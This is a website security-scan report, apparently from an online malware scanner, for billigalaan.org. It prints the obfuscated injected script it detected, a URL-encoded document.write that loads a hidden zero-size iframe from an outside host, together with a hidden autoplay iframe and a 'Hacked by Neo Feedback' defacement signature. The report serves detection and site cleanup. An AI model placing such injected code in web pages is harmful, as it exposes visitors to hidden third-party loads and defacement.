Scanned pages/files
Request | Server response | Status |
http://billigalaan.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Nov 2015 17:54:31 GMT Location: http://www.billigalaan.org/ Server: Apache Vary: Accept-Encoding Content-Length: 235 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.billigalaan.org/ | 200 OK Content-Length: 3460 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> Deface/Content modification. The following signature was found: Hacked by Neo Feedback <html> <head> <title>Hacked by Neo Feedback</title> <link rel="icon" href="https://aronno1920.files.wordpress.com/2015/07/neofeedback.png" type="image/x-icon"> <script language="JavaScript">var brzinakucanja=200;var pauzapor=2000;var vremeid=null;var kretanje=false;var poruka=new Array();var slporuka=0;var bezporuke=0;poruka[0]="Hacked by Neo Feedback" poruka[1]="Hacked by N30 F33D64CK" function prikaz(){var text=poruka[slporuka];if(bezp ...[3417 bytes skipped]... | ||
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/javascript | clean |
http://billigalaan.org/typed.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 21 Nov 2015 17:54:33 GMT Location: http://www.billigalaan.org/typed.js Server: Apache Vary: Accept-Encoding Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.billigalaan.org/typed.js | 200 OK Content-Length: 3460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> | ||
http://www.billigalaan.org/test404page.js | 200 OK Content-Length: 3460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: billigalaan.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 21 Nov 2015 17:54:31 GMT
Location: http://www.billigalaan.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
...235 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: billigalaan.org
Referer: http://www.google.com/search?q=billigalaan.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=billigalaan.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://billigalaan.org/
Result: billigalaan.org is not infected or malware details are not published yet.